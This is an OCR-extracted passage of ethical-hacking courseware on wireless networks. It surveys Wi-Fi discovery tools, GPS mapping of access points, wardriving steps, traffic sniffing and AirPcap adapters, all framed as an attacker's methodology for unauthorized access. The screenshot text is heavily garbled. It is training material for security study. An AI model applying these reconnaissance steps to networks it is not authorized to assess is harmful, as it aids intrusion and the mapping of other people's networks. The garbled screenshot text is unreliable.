Active Dead Dead Dead Dead Active Active Active Dead Active Dead Active Active Active Active Active Active Dead Active Active Active Active Active LlAN E-PC.N et.. Rajpriya BUFFALO Kiang HSPAWirelessG... Bonjour HOME Lai's home superlink linksys yee_family EW H O M E Philip dlink Ng's Family speed1 SSID TP -U N K linksys22F KUO_BELKIN ling-Hom e JackyPO Signal 0% 0% 0% 0% 2 6% ) _ 3 8% ( - _ 100% 0% 3 8% ( - _ 0% 3 6% ( - _ 38% (_ 34% ( - _ 2 8% (_ 8 8% ( - _ 3 4% ( - _ 0% 36% )-. 2 6% 1 0 % )-
0 0 0 0 .0 0 0 0 0 0 0 0 .0 0 0 0
Authentication WPA2-PSK WPA-PSK Open WPA2-PSK Open WPA-PSK WPA2-PSK WPA2-PSK Open Open WPA-PSK WPA2-PSK WPA2-PSK Open WPA-PSK WPA2-PSK WPA2-PSK WPA2-PSK WPA-PSK Open WPA2-PSK WPA2-PSK Encryption AES AES WEP AES WEP TKIP AES AES WEP Unencrypted TICP AES AES WEP TICP AES AES AES TKIP Unencrypted AES AES
S Authentication (j) Channel (j) Encryption S Network Type i SSID
# w 34 33 32 31 * 30 #29 *28 w 27 at 26 25 *24 23 22 #21 *20 *19

_
High Signal 8 8% (-38... 3 0% (-78... 2 6% (-81... 3 2% (-77... 8 8% (-38... 6 0% (-58... 100% (-30... 1 6% (-88... 8 8% (-38... 8 8% (-38... 8 8% (-38... 8 8% (-38... 8 8% (-38... 30% (-78... 8 8% (-38... 8 8% (-38... 8 8% (-38... 36% (-74... 8 8% (-38... 1 8% (-86...
IS
#17 *16 15 * 14 #13
4 6 % )-. 8 8% (-38... 7 4 % (-... 8 8% (-38...
FIGURE 15.29: Vistumbler Screenshot
Module 15 Page 2245
Wi-Fi D iscovery Tool: W irelessM on
CEH -------
> W i-Fi Discovery Tool: W irelessM on
yi-,; Source: http://www.passmark.com WirelessMon is a software tool that allows users to monitor the status of wireless Wi-Fi adapter(s) and gather information about nearby wireless access points and hot spots in real time. It can log the information it collects into a file, while also providing comprehensive graphing of signal level and real time IP and 802.11 Wi=Fi statistics. Some of the features of WirelessMon include:
9 9 9
Verify 802.11 network configuration is correct

Test Wi-Fi hardware and device drivers are functioning correctly Check signal levels from your local Wi-Fi network and nearby networks
9
9
Help locate sources of interference to your networ Scan for hot spots in your local area (wardriving) GPS support for logging and mapping signal strength Mapping can be performed with or without a GPS unit Correctly locate your wireless antenna (especially important for directional antennas)
9
9 9
Module 15 Page 2246
9 9 9
Verify the security settings for local access points Measure network speed & throughput and view available data rates Help check Wi-Fi network coverage and range
* I WiroletsMon Evaluation Copy
File CorfiguiotKn Hdp
I^
SetaaNetvrafcCad
a t
METGEAR WG1 v354Mfcp1 Viietess USB 2 0 Adaptef * Parkel Sc+ due. Wripori v [Reload Cads |
F r^ 1 * y Status 0 N U Ava A Net Ava. ^C o nn ec ... A Available 0 Avaibbte 0 Av*1khl* 0 Available 0 Available 0 Available & Available
2462MH1 SSID BWC p a n a k Network MpuHi;hc* pr. 9001w1ete... Zrvai-go lippnjpoint MaikclPulseA Chsnnel 6 13 6 8 6 6 5 R d !3 5curfy Fc-juivd I a 1 !3 Faquiad Fegmed Feguwd FcaUicd PA9jr#d Feguicd Fequred Fequiitd Feguted F c jtiic d 1 F 9 jf#d A ^ RSSI Z 3 N /A |L1 *yrm 92 N /A lLc cgrv* 96i 56 C J 62 66 j 64 69 70 83 92 N /A iLos iy n d 921 91 1 1 N/A 1 Ml m m J .! Net 6 (d s s s ) e (D sss! G (0FDM24) G (0FDM24) G (0FDM24) G (0FDM?4| G IQFDM24) G (0FDM24) G (0FDM24) G |OFOH24| G (0FDM24) G (0FDM24) r. 1nfnM?41 A Rales Stopoirecl . 0/55/2.0/1 .. . 0/55/2.0/1 54 0/48 0/36.0/ 54 0/48 0/36 0 / 54.0/48.0/36.0/.. s4n /4 8 0 /3 ; (1/ 54.0/480/36.0/.. 54 0/40 Q /X 0 / 54 0/48 0 /3 6 0 / 54 0/48 0/36.0/.. 54.0/480/36.0/.. 54 0/48 0/36 0 / s i n/1 n/TRri/ MAC Add 00 301 4 0.. 00 02 2d 0.. 00 Id 92 c.. 00 Of 651 00 1d 92 c... n n 1 1 95 8 001839 e.. 00 14 Gc e 0017311 UU 1b a 00 6 4 c 5.. 00 217 6 ru rp a Inf1 as(1 uc InlidMiw.!.. Infrattrucl In fia ttttd Infrasiiuci In fio jtiict.. In fiM lnr.l Infiasuuct.. Infra&lruct Inftasiturl intiasULCt In fia iliic t.. Infiattru:! Infr A*tn r Fisl T in * ce.13.09 0613 25 0614 14 0609 54 06.09.54 ffi-fW -M C&09 54 0&09 54 0609 54 08:09:54 06.09.54 06-09 54 r 1n * <
N tf A vo... chink 0 Av-ailuN# ICUR A M r t i\1 " <
3 0areas xints detected (29 secute 1 urrsecu-eJ) 1 1 available
FIGURE 15.30: WirelessMon Screenshot (1 of 2)
WirebccMon Evaluation Copy

F4 Confcgvton H <*lp
E m
., a S i 8! ^ 0 3 0 ^ 0
CdeclNohvoikCard N ET C E A R W SI1lv3WMtsW1elestU B 2 C A 0 Pacte<S^<is<Mnpcrt v ' |ndM dCtol
SSID MACAOdieiS
W/A U/A
|
f c 1 5
Storgth |N/A
Sw edlM Wil N/A AJhType FfagTWeshoJd RTS (hiesfoM N/A M/A M/A
Frequency [w/s,____________ Status Hoi A /a O Avalctte 0 A v d o b le 0 A v a lc t*e 0 A v l flWe 0 Avalitte 0 A v o id s ^ Not A/a. ^ Not Ava Not A/a. SSID CUR MaketPUseA... MDASydnor Hevoik lippirgpoinl BcP0rd9146 Komp_Robwla Bowslar QDGtD abjaWan :prngboorchp iVf-Lolct^r C 5 6 6 6 C 8 6 6 6 G 8 7 8 q A 2 Senxity Rm u i Reaii.. Rcgut Ream nqo* RSSI w a il -32 95 & FateiSu 54 0/480 5^.0/480 5 i 0/480 5 ^0 /48 0 54 0/400 54 0/480 54.0/480 54 0/480 54 0/480 54 0/400 54 0/480 54 0/480 54 0/48 0 M r v ja n M A: Add 00 12 17 6 001311 a.. OOOb59.. 00 O t5 1.. 00 173M 001a2b1 00 24 024.. 00 179a 1 00 O 66 a 00 Id ?d3 0053719 00 21 912.. 00 1d92c n r 1 iHr Netvtok. 610FCM24J 6 10FCW24) G (OFCM24) 6IOFCM24I G|0rCM24J 610FCM24J 6 (OFCM24) 6 10FCM24) 6IOFCM24I GiOFCM24| 610FCM24J 6 IOFCM24! G IOFCM24) 6 m crw ?i1 Inbaelruc.. W iajttuci. Infiaaiuci.. In fiaîucl. InfiastiucL Irrfiaetiuol. Infiattiucl.. InfiastiucL. Infiattiuoi.. Inliasttuc!. Infiartiuci.. Wiastiuc!. InfiastiucL Infiattiucl .^ First Tine COOS 54 2. C8.0954 2. C80954 2. C6 0354 2. roo o5 4 2 . C &09952. C609582. C8 10 14 2 . re 10 28 2 . ra 1 0 x 2 C 81 03 22. ce 10 33 2. C80954 2. r R in m 7 Lat Tin. 08 1053 2. j: 10.55 2. 08 1055 2. 08 00 08 08 08 1 1 I. 1055 2. 055 2 1055 2. 1055 2. 1053 1047 2. 1032 2. 1053 2 10 38 2. 10552 m rw
87 L J 78 R x 32 R rg u i. Rw! vj; a (L Ream RguM Reou! R ea * Rmjlm Rm h n /a i l s /a i l n 'J/AIL 'j.A l .73 M/a < 1
^ No A /a ^ N o lA /j. J AvalaN A tM A />
21 k c k ( pototc dt#<t#d(21 w a r 0 unttr#d) 11 avaUbk
FIGURE 15.31: WirelessMon Screenshot (2 of 2)
Module 15 Page 2247
M obile-based Wi-Fi D iscovery Tool

m m b L ...1 W , , i
j
Urt1fw4
CEH
ilhiul lUtbM
c
WiFiFoFum W iFi Scanner N etw o rk Signal Info
http://www.dynamicollyloaded.com
h ttp://w w w . kaibits -software, com
OpenSignalMaps
http://km ansoft.com
http://opensignal.com
M obile-based W i-F i Discovery Tool W iFiFoFum - W iF i Scanner

Source: http://www.dvnamicallvloaded.com WiFiFoFum is a mobile Wi-Fi scanner that allows you to scan the network for 802.11 Wi-Fi networks. This provides you information about each network it detects and gives detailed information about the networks SSID, MAC, RSSI (signal strength), channel, AP mode, security mode, and available transmission rates. It can scan surrounding networks, discover Internet access, gives comprehensive AP's configuration information, and this can also map APs.
Module 15 Page 2248
Network;
Nearby
01
Radar
Logging
1 ?% ..
IB |
Nearby
Radar
Logging
k e llu t s 5 9 0 0 :2 2 :3 f :b 8 : a 4 : 0 c
S K Y 3 9 6 7 S I0 0 :lb :2 f:e d :e 7 :d 0 I S p y k e W ire le s s
0 0
:1 c : d f : a 1 : e 0 : 6 a
SKY47411 0 0 :1 e :7 4 :6 2 :b 9 :3 4 NETG EAR 0 0 :H :3 3 :4 a :9 e :8 e
Kirkcoonel
0 0 :0 d : 0 b : 0 5 : b b : 9 b
FIGURE 15.32: WiFiFoFum scanning the network for 802.11 Wi-Fi networks
Network Signal Info

Source: http://www.kaibits-software.com Network Signal Info provides detailed information on your currently used network, regardless of whether you are using a Wi-Fi or a cellular connection.
*A I 1 02 0H $ >
N e tw o r k S ig n a l .
M oM * Sig n al W# 1 Sig n al
1 1 :1 9
N e tw o r k S ig n a l In fo / 0 X
E9
W iF i A M 0 6 .k
S y t le m In fo
!ill! *
N l op*f * 10 / S n operator Pt0 n *typ K c l type N *t treogtf> n*u % \m * 0 U *CtiyiTy 0 0 2SM S0 3 7 1 A C 41729 Country co<k D#vtc* O O M fl IP) 192 168 0 112 eternal IP 95 2 23 13 S 206 60 02 6 disco G SM H SO PA (7 2 9Sd 8ro(A SU 9) fa u o o o + c ttti
FIGURE 15.33: Network Signal Info screenshot
Module 15 Page 2249
( : )
INT6RN6T AR6A
W iF i M anager
Source: http://kmansoft.com
WiFi Manager is software that allows you to get a full explanation of the Wi-Fi connection state that is used with a screenshot widget. You can get information about when it was switched on/off connection process, signal level presented in colors, and the current network's SSID.
WIFI Manager Premium
Settings
b I A u to
1
U p d ate
5 GHz Channels
Do not display
dBm in R a d a r m o d e
Show M lm wt l*v*ls is dBm

P la y s o u n d fo r o p e n n e tw o rk
Sound dtubled
C hoo se sound
V ib r a t e fo r o p e n n e tw o r k s
Vttort&on disabkd
IB S S w a r n in g
Warn about IBSS (AdHoc) rwtwocks no(

w o r io n f
0 0no( srtow *sum s tvir !ton

E n a b le W iF i o n s ta r t
N o tif ic a t io n ic o n
w '.
FIGURE 15.34: WiFi Manager Screenshot
Module 15 Page 2250
6?
OpenSignalMaps
Source: http://opensignal.com
This website delivers you with visualization and study-based data together with the exact signal of the service providers in a particular area with cellular coverage maps. 4
Ovtr*w
O O frf 1 2 3 21 IX
IfUo
U p
Grapli
$c*d
Ct
CVtrvww
.11
0
Grich
O
Scw d
t
Cells
Signal strength: 28%
m * * rfO O ( d B n . *C 1 0 8 6 7 J
Jtow m round newfey. xiuon rafitilMd. Auurat to to 4 j g f .
Tower direction:
< = >
rî
cd1
FIGURE 15.35: OpenSignalMaps showing the signal of service providers with cellular coverage maps
Module 15 Page 2251
W i- F i D i s c o v e r y T o o l s
[ j ib WiFi Hopper
h ttp ://w w w . w ifi hopper, com
CEH
Wellenreiter
h ttp://w ellenreiter.sourceforge.net
W a v e s tu m b le r
AirCheck Wi-Fi Tester

http://w w w .fluke ne tw o rks.com
h ttp ://w w w .cq u re .n e t
iStumbler
, , j
PW h
AirRadar 2
h ttp ://w w w . koingos w. com
h ttp ://w w w .istu m b le r.n e t
WiFinder
h ttp ://w w w .p g m s o ft. com
X ir r u s W i- F i In s p e c t o r
h ttp ://w w w .xirru s.com
Meraki WiFi Stumbler

http ://m e ra ki.co m
t&
W if i A n a ly z e r
h ttp ://a .fa rp ro c . com
W i-Fi Discovery Tools

Wi-Fi discovery tools can discover networks (BSS/IBSS) and detect ESSID broadcasting or % non-broadcasting networks and their W EP capabilities and the manufacturer automatically. These tools enable your Wi-Fi card to find secured and unsecured wireless connections where you are. A few of the Wi-Fi discovery tools are listed as follows: & 9 9 9 Q WiFi Hopper available at http://www.wifihopper.com Wavestumbler available at http://www.cqure.net iStumbler available at http://www.istumbler.net WiFinder available at http://www.pgmsoft.com Meraki WiFi Stumbler available at http://meraki.com
Q Wellenreiter available at http://wellenreiter.sourceforge.net 9 9 9 9 AirCheck Wi-Fi Tester available at http://www.flukenetworks.com AirRadar 2 available at http://www.koingosw.com Xirrus Wi-Fi Inspector available at http://www.xirrus.com Wifi Analyzer available at http://a.farproc.com
Module 15 Page 2252
CEH
UrtifM tUx*l Nm Im
C ra c k
Wi-Fi
Lau n ch W ire le ss A tta c k s
Copyright b y
EG-G*ancil. All

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. To accomplish this objective, first you need to discover Wi-Fi networks and then perform GPS mapping of networks.
Module 15 Page 2253
G P S M a p p in g
Attackers create map of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStum blers etc.
Crt1fW 4
CEH
ItkKjl Nm Im
W
J
G PS is used to track th e location o f the discovered Wi-Fi networks and the coordinates are uploaded to sites like W IG L E
Attackers can share this inform ation with the hacking to com m unity or sell it to make m oney
V 1 ____________ > L ^ 1I
A ttacke r n e tw o rk s
1 1 ------------ > r
Post th e GPS locations to W IG L E
D isco ve ry o f W i-F i
GPS M apping
GPS is funded and controlled by the Department of Defense (DOD) USA. It was especially designed for the US military, but there are many civilian users of GPS across the world. A GPS receiver calculates position, time, and velocity by processing specifically coded satellite signals of GPS. Attackers know that free Wi-Fi is available everywhere and also there may be a possibility of unsecured network presence. Attackers usually create maps of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStumblers, etc. GPS is used to track the location of the discovered Wi-Fi networks and the coordinates uploaded to sites like WIGLE. Attackers can share this information with the hacking to community or sell it to make money.
L eJ
A tta c k e r D is c o v e r y o f W i- F i n e tw o rk s
I r J
P o st th e G P S lo c a t io n s t o W IG L E
FIGURE 15.36: Tracking the location of the discovered Wi-Fi network and uploading it to WIGLE site
Module 15 Page 2254
GPS M apping Tool: W IG LE

Source: http://wigle.net WIGLE consolidates location and information of wireless networks world-wide to a central database, and provides user-friendly Java, Windows, and web applications that can map, query, and update the database via the web. Using this user can add a wireless network to WIGLE from a stumble file or by hand and add remarks to an existing network. It allows finding a wireless network by searching or browsing the interactive map.
Module 15 Page 2255
C < 1 |D
Wigle.net/9ps/gp5/Map/onl1nefrap2/ mapla1^39 7SS9S856&maplon^-86.02879333. &
Homo Download Foiums Pot Fila Query Ssmcnshots SU JS Uploads Wob Maps
Browsable Map 0 the World

| H ,3 fd 1 ren a n |
5Wiki
Logout
Link to th|s 0
T | | Map | Satellite
atrude
39 7092 to 39 3092
ngrtude -6 0349 to -86 0077 U S Geocoding
State
Zip
r_3 y_
BSSID 1 3 0 00 00 00 00 05 Stan Year Erd Year

y
2001 2013[ -
Use OpenStreetMaps 11 Possible FreeNet Possible Commercial Met F rst Discovered By Me First Discovered By Others I No Labels
PoM .A ir i Wit IJet

*nx*
+ ,".u,
I GSM Cellular Net COMA Cellular Met lUpcatel Notes Double click or drag on map to re center Hyou zoom m far enough ssid will be displayed 2 : re mao doesnt show up try the previous or original webntaos instead v.1de voa purple less dense yellow more dense close view red wifi low QoS green wifi high QoS blue cell tower 3 jalitv of Signal higher seen multiple times by multiple ooservers Downoad our Android App
Go gle [ search the map
FIGURE 15.37: WIGLE locating the wireless network by searching the interactive map
Module 15 Page 2256
ShowHg slalions 1 thiough 100 of this query |nexl100 |

MP rid rid <vep trilat triloig
U " ' Y 0* 23 15 3C 9 Z9 9e 3 C O O O 03 3 K 3 1 ' oc 3002 12 C OO C 00 18 20 4; 000040 2 0 10 -1 X 21 :oc: C O 9C 00 01 3 1 :033-08- 2 0 1 1 00 09 92 CSC: 1 4e 24 23 9 ' I :030 03 20 10 1* O C 01 non? C O X 00 1*41 19 2034 09 23C3-0327 :3 3 S3 10 14e *0 2-05- 2012-00 2a 3* C7 04 43 10 2* 03 7 2011-08 2011-08 03 03 &02* 1 7 UJ 20 2 2011-01
| z
L 3S 00.02X0 3;
m *rtt;
tl
i9 75C9C8C 8 0 02879333
Qtt C O 00 00 0 c C O 3*
f/RA
!Hr
37 70557730 9 2 992 ?0 '93
'211
COOO 00 00:00.18
o-hsc
05 9129:191
-83.408*1875
an
30 O C 00 D O 00 IE
XEHCX s2 >*P0 *AT 10 n
*5 *9C070SC 1 2 1 3895C9C!
)Eiv^Q*r nKanniVi. 2 1! cooo 00 00-00 28 FlMMO Mi d U B
in*
*8 57787323
M *34*118
00 0C 00 00 00 2E
3 QAOûMt in* 7
?3 42516891
14 84800-57
Ss> co 00 00 00 00 36 04 00 0C 00 00 00 3E Map
68 GT812CT4
12 84328201
47*
39 7837:3*4
88 0381135
COOO 00 03 C O 41
!*
7 00 1C 5 2010-11 2010-12 1e 23 15 5* 56 C9!* 07 2)3548- 20Cr 3 8 D C 18 3003 M 3 23 C O 43 29 p m a . :>!>3.|| ||
0 00000300
0 09000000
211 C OO O 00.00.00.4* Mag
wii(1
info
83 1 1525
co oo 00 .00 .co. ; ReaHSP 03917478
acne =*-'331 :033-7*3? II II 1
1**3 II
Y ||
84.337371 3 33.91335187 -
l JI
!1
FIGURE 15.38: WIGLE Screenshot
Module 15 Page 2257
G P S
a p p in g
T o o l: S k y h o o k
Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points
<-
(: wvm-skytwokwirelessxomnoc. Type in your eccre-ss and cfcck Find It
rage.php
ook Location
http://www.skyhookwireless.com
GPS M apping Tool: Skyhook

K-Xv Source: http://www.skvhookwireless.com Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points. It uses a combination of GPS tracking and a Wi-Fi positioning system for determining the location of a wireless network indoor and in urban areas. It even discovers the position of the mobile device at a distance of between 10 to 20 meters with the help of the MAC address of the nearby wireless access points and proprietary algorithms.
Module 15 Page 2258
S kyhook Location Te<hr
____
w w w .skyh ookw 1reless.com
x a t io n t e ^ ology/carage.php
Typ in your 6ddrss and click Find k.
oo k Location Su p p o rt
fctV * R e J|c
. n
I*
Gfm a,'
**r.
' Si & g f c a /
Tm ** C S l* rc a se -E > c a i n i N ational M orm m eA; t ?*$ +* Wr-~-- - ' * o i d A

F M * G r a n d ./ S f | | Gr>dC*010f1
\ . /
Ljt
T 4 L
O unV M W y N M W Pul
i l a s W K j 'I S M . ' ,H w e F ie fi
i ? Y JuiilMa
uJ
:
N
r v
t
** *
C o
<gle
Arizona
A viio*
Find It
uap data C2E12 Gogfltt m o l U w
A d d r e s s lo o k u p
235 2nd Si San Francisco CA
FIGURE 15.39: Skyhook Screenshot
Module 15 Page 2259
i- F i H o ts p o t F in d e r : j iW
ir e
C E H
w jiw ire
0 o 4
W i- R F in d e r
,, Q
5 :1 8
pm
Q.
Ust
O ptions
22 near M arket Street
Ji W ir e is a W i- Fi h o tsp o t lo catio n d ire c to ry w ith m o re th a n 788,723 fre e an d paid W i- Fi h o tsp o ts in 145 c o u n trie s http://v4.jiwire.com
Copyright b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.
W i-F i Hotspot Finder: JiWire

Source: http://v4.jiwire.com JiWire is a Wi-Fi hotspot location directory with more than 788,723 free and paid Wi-Fi hotspots in 145 countries and it monitors your wireless connections. It is a simple way you can discover wireless Internet that small businesspeople take advantage of as well as persons working remotely. Individuals can easily browse for Wi-Fi hotspots not only based on their location, but also based on any predetermined criteria such as address, city, or ZIP code.
Module 15 Page 2260
Jl W ITG
- w m F in d e r
1 *)* * * < * < 1 cvpi
13 Free
f i 9 Pay
lip '
FIGURE 15.41: JiWire discovering free and paid Wi-Fi hotspots
Module 15 Page 2261
i- F i H o ts p o t F in d e r : W
e F i
C E H
(rtifwtf ttfciul lUchM
Wv i a * p * I www.wefi.com nacs/
SEARCH \ \
235 2nd St San francisco CA
h ttp ://w w w . wefi. com

Copyright by IC-50U!1C1I. All Rights R eserved. Reproduction is Strictly Prohibited
^ W i-Fi Hotspot Finder: W eFi

> Source: http://www.wefi.com WeFi provides you with Wi-Fi hotspot locations. It discovers the new connection and automatically connects you to the one that is the best for your needs. The desktop version will add the newly founded hotspots with the help of your system to the WeFi database automatically. You can even find nearby Wi-Fi hotspots in your vicinity with WeFi.
Module 15 Page 2262
FIGURE 15.38: WeFi locating Wi-Fi hotspots
Module 15 Page 2263
H o w to D i s c o v e r W i Fi N e t w o r k U s i n g W a r driving
STEP 1
STEP 2
STEP 3
Register w ith W IG L E and d ow nlo ad m ap packs of you r area to v ie w the plotted access points on a geographic map
Connect the antenna, G P S device to th e laptop via a U S B serial ad ap ter and board on a car
Install and launch N etStum b ler and W IG L E client so ftw are and turn on the G PS device
STEP 5
STEP 6
Drive th e car at speeds of 35 mph or b elo w (At higher speeds, Wi-Fi an ten na will not be able to d etect Wi-Fi spots)
C apture and save the N etStu m b ler log files w hich contains G PS coordinates of the access points
Upload this log file to W IG L E , w hich w ill then au tom atically plot the points onto a map
Copyright b y
EG-Grancil. All
How to Discover W i-F i Network Using W ardriving
Wardriving is one of the techniques used for discovering the Wi-Fi networks available in the vicinity. In order to discover Wi-Fi networks using wardriving, the user should follow these steps: Step 1: Register with WIGLE and download map packs of your area to view the plotted access points on a geographic map. Step 2: Connect the antenna and GPS device to the laptop via a USB serial adapter and put it in your car. Step 3: Install and launch NetStumbler and WIGLE client software and turn on the GPS device. Step 4: Drive the car at speeds of 35 mph or below (at higher speeds, the Wi-Fi antenna will not be able to detect Wi-Fi spots). Step 5: Capture and save the NetStumbler log files that contain GPS coordinates of the access points. Step 6: Upload this log file to WIGLE, which will then automatically plot the points onto a map.
Module 15 Page 2264
Wireless H a c k i n g M e t h o d o l o g y
C E H
>1
;
: ^
C o m p ro m ise th e W i-Fi N e tw o rk
C ra c k W i-F i E n c ry p tio n
L au n ch W ire le ss A tta c k s
- ^ Wireless H acking Methodology

_ As mentioned previously, the objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. In the wireless hacking methodology, the third phase is to analyze the traffic. An attacker performs wireless traffic analysis before committing actual attacks on the wireless network. This wireless traffic analysis helps the attacker to determine the vulnerabilities in the target network.
Module 15 Page 2265
W ir e le s s T r a ffic A n a ly s is
Identify Vulnerabilities
1. Wireless traffic analysis enables attackers to identify vulnerabilities and susceptible victims in a target wireless network 2. This helps in determining the appropriate strategy for a successful attack 3. Wi-Fi protocols are unique at Layer 2, and traffic over the air is not serialized which makes easy to sniff and analyze wireless packets
C EH
)
Wi-Fi Reconnaissance
Attackers analyze a wireless network to determine: Broadcasted SSID Presence of multiple access points Possibility of recovering SSIDs * Authentication method used WLAN encryption algorithms
Wireshark/Pilot Tool
CommViewTool
OmniPeek Tool
Wi-Fi packet-capture and analysis products come in a number of forms
AirMagnet Wi-Fi Analyzer
Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.
r1 .rt.rw fu
Wireless Traffic Analysis

how data the and
Wireless traffic analysis provides a detailed report of the who, what, when, and of Wi-Fi activities. The traffic analysis process involves multiple tasks, such as normalization and mining, traffic pattern recognition, protocol dissection, and reconstruction of application sessions. It enables attackers to identify vulnerabilities susceptible victims in a target wireless network. The wireless traffic analysis helps Id e n t if y in g V u ln e r a b ilit ie s
Wireless traffic analysis enables attackers to identify vulnerabilities and susceptible victims in a target wireless network. It helps in determining the appropriate strategy for a successful attack. Wi-Fi protocols are unique at Layer 2, and traffic over the air is not serialized, which makes it easy to sniff and analyze wireless packets. W i- F i R e c o n n a i s s a n c e Attackers analyze a wireless network to determine: 9 9 9 9 Broadcast SSID Presence of multiple access points Possibility of recovering SSIDs Authentication method used
Module 15 Page 2266
WLAN encryption algorithms
Wi-Fi packet-capture and analysis products come in a number of forms. Several tools are available online to perform wireless traffic analysis. Examples of wireless traffic analysis tools include CommView Tool, AirMagnet Wi-Fi Analyzer, Wireshark/Pilot Tool, and OmniPeek Tool.
Module 15 Page 2267
W 1
J
ir e le s s
C a r d s
a n d
C h ip s e t s
C E H
(rtilwd EUkI NMhM
Choosing the right Wi-Fi card is very important since tools like Aircrack-ng, KisMAC only works with selected wireless chipsets
Copyright b y IC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.
Wireless Cards and Chipsets

Choosing the right Wi-Fi card is very important since tools like Aircrack-ng and KisMAC only work with selected wireless chipsets. A few considerations are mentioned here that the user should follow in order to choose the optimal Wi-Fi card. D e t e r m in e y o u r W i- F i r e q u ir e m e n ts Decide if you simply want to listen to wireless network traffic or both listen to and inject packets. Windows have the capability of only listening to network traffic but don't have the capability of injecting data packets, whereas Linux has both the listening and injecting packets capability. Based on these issues here you need to decide: The operating system that you want to use. Q 9 Hardware format such as PCMCIA or USB, etc. And the features such as listening or injection or both. L e a r n th e c a p a b ilit ie s o f a w ir e le s s c a r d Wireless cards involve two manufacturers. One is the brand of the card and the other is the one who makes the wireless chipset within the card. It is very important to realize the difference between the two manufacturers. Knowing the card manufacturer and model is not sufficient to choose the Wi-Fi card. The user should know about the chipset inside the card. Most of the chipset manufacturers don't want to reveal what they use inside their card, but for
Module 15 Page 2268
the users it is critical to know. Knowing the wireless chipset manufacturer allows the users to determine the operating system that it supports, required software drivers, and the limitations associated with them. D e t e r m in e th e c h ip s e t o f th e W i- F i c a r d The user first needs to determine the wireless chipset inside the card that they are thinking to use for their WLAN. The following are the techniques that can be used to determine the chipset inside a Wi-Fi card: 9 9 Search the Internet. You may have a look at Windows driver file names. It is often the name of the chipset or the driver to use. Check the manufacturer's page. You can physically see the wireless chip on some cards such as PCI. Often the chipset number can also be observed. You can use the FCC ID Search to lookup detailed information of the device in case if the device consist a FCC identification number on the board. It gives the information of the card about the manufacturer, model and the chipset.
9 9
Sometimes the card manufacturers change the chipset inside the card while keeping the same card model number. This is usually called "card revision" or "card version." So, while determining the chipset of the Wi-Fi card, make sure to include the version/revision. The chipset determining ways may vary from one operating system to the other. You may visit http://madwifi-proiect.org/wiki/Compatibilitv for compatibility information. V e r if y th e c h ip s e t c a p a b ilit ie s After choosing a Wi-Fi card, check or verify whether the chipset is compatible with your operating system and check whether it is meeting all your requirements. If the chipset is not compatible with the OS or not meeting the requirement criteria, then change either the OS or the chipset depending on the requirement. D e t e r m in e th e d r iv e r s a n d p a tc h e s r e q u ir e d You can determine the drivers required for the chipset using the drivers section and determine the patches required for the operating system.
After determining all these considerations of a chipset the user can find a card that uses that particular chipset with the help of compatible card list.
Module 15 Page 2269
Wi-Fi USB Dongle: AirPcap

J J AirPcap adapter captures full 802.11 data, management, and control frames that can be viewed in Wireshark for in-depth protocol dissection and analysis AirPcap software can be configured to decrypt WEP/WPA-encrypted frames
CEH
AirPcap Control Panel
F e a tu re s
It provides capability for simultaneous multi-channel capture and traffic aggregation
Mode( AjrPcap Nx Transm it yes Interface AiPoap USB wwetess capture adaptef n r. 00 v]
L =l!
Blink Led j
Settings Keys_________________________________________________
Medw: 802.11 /b/jj/n
It can be used for traffic injection that help in assessing the security of a wireless network AirPcap is supported in Aircrack-ng, Cain and Able, and W ireshark tools 9 A irPcapReplay, included in the AirPcap Softw are Distribution, replays 802.11 network traffic that is contained in a trace file
Basic Conflation Channel 2412MHz(BG 1) 0 v FCS Fiei All Flames v v
\ y \ Include 80211 FCS in Fram es
Extension Channel CepmeTjue
802110n(y
Reset Configuration
http://www.riverbed,com
Copyright by IC - C o u cil. All Rights Reserved. Reproduction is Strictly Prohibited.
W i-Fi USB Dongle: AirPcap

Source: http://www.riverbed.com
AirPcap captures full 802.11 data, management, and control frames that can be viewed in Wireshark providing in-depth protocol dissection and analysis capabilities. All AirPcap adapters can operate in a completely passive mode. In this mode, the AirPcap adapter can capture all of the frames that are transferred on a channel, not just frames that are addressed to it. This includes data frames, control frames and management frames. When more than one BSS shares the same channel, it can capture the data, control, and management frames from all of the BSSs that are sharing the channel within range of the AirPcap adapter. AirPcap adapters capture traffic on a single channel at a time. The channel setting for this can be changed using the AirPcap Control Panel, or from the "Advanced Wireless Settings" dialog in Wireshark. Depending on the capabilities of a specific AirPcap adapter, it can be set to any valid 802.11 channel for packet capture. It can be configured to decrypt WEP-encrypted frames. An arbitrary number of keys can be configured in the driver at the same time, so that the driver can decrypt the traffic of more than one access point simultaneously. W PA and WPA2 support is handled by Wireshark. When monitoring on a single channel is not enough, multiple AirPcap adapters can be plugged into your laptop or a USB hub and provide capability for simultaneous multi-channel capture and traffic aggregation. The AirPcap driver provides support for this operation through MultiChannel Aggregator technology that exports capture streams from multiple AirPcap adapters as
Module 15 Page 2270
a single capture stream. The Multi-Channel Aggregator consists of a virtual interface that can be used from Wireshark or any other AirPcap-based application. Using this interface, the application receives the traffic from all installed AirPcap adapters, as if it was coming from a single device. The Multi-Channel Aggregator can be configured like any AirPcap device, and therefore can have its own decryption, FCS checking, and packet filtering settings. It can be used for traffic injection that helps in assessing the security of a wireless network. It is supported in Aircrack-ng, Cain and Able, and Wireshark tools. AirPcapReplay, included in the AirPcap Software Distribution, replays 802.11 network traffic and that is contained in a trace file.
AirPcap Control Panel

S e ttn g s Keys
L- - L5 1 1
In te r f a c e V
A ir P c a p U S B
w v e le s s c a p tu r e a d a p te r n r 0 0
B fc n k L e d
M odel
A Pcap N x
T r a n s m it
yes
M ed a
80211
a/b/g/n
B a s i c C o n fig u r a t io n
Channel
2 4 1 2 M H z (B G
1)
In c lu d e 8 0 2 1 1
F C S in F r a m e s
E x te n s io n C h a n n e l
C a p tu re T y p e
80211
O n fc
F C S F ie r
A I Fram es
H e lp
R e s e t C o n fig u r a t io n
0 k
A p p ly
C ancel
FIGURE 15.39: AirPcap capturing 802.11 data
Module 15 Page 2271
